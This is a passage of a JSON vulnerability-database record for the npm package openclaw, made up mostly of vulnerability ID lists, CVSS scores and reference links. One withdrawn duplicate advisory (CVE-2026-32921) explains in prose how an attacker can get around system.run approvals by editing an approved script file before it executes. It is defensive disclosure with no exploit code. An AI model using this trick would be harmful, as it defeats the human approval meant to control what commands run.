e4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3
up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5
bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wk
ye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:np
m/openclaw@2026.3.8"}],"aliases":["GHSA-xg59-f45v-9r9j"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g9jn-c2rf-byem"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91170?format=json","vulnerability_id":"VCID-gj27-bfws-uyfp","summary":"Duplicate Advisory: OpenClaw's system.run approvals did not bind mutable script operands across approval and execution\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-8g75-q649-6pv6. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.8 contains an approval bypass vulnerability in system.run where mutable script operands are not bound across approval and execution phases. Attackers can obtain approval for script execution, modify the approved script file before execution, and execute different content while maintaining the same approved command shape.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/c76d29208bf6a7f058d2cf582519d28069e42240","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/c76d29208bf6a7f058d2cf582519d28069e42240"},{"reference_url":"https://github.com/openclaw/openclaw/commit/cf3a479bd1204f62eef7dd82b4aa328749ae6c91","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring
_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/cf3a479bd1204f62eef7dd82b4aa328749ae6c91"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32921","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32921"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-script-content-modification-via-mutable-operand-binding-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-script-content-modification-via-mutable-operand-binding-in-system-run"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8g75-q649-6pv6","reference_id":"GHSA-8g75-q649-6pv6","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system"
:"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8g75-q649-6pv6"},{"reference_url":"https://github.com/advisories/GHSA-wwrj-437c-ppq4","reference_id":"GHSA-wwrj-437c-ppq4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wwrj-437c-ppq4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"V
CID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"V
CID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"V
CID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"V
CID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"V
CID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-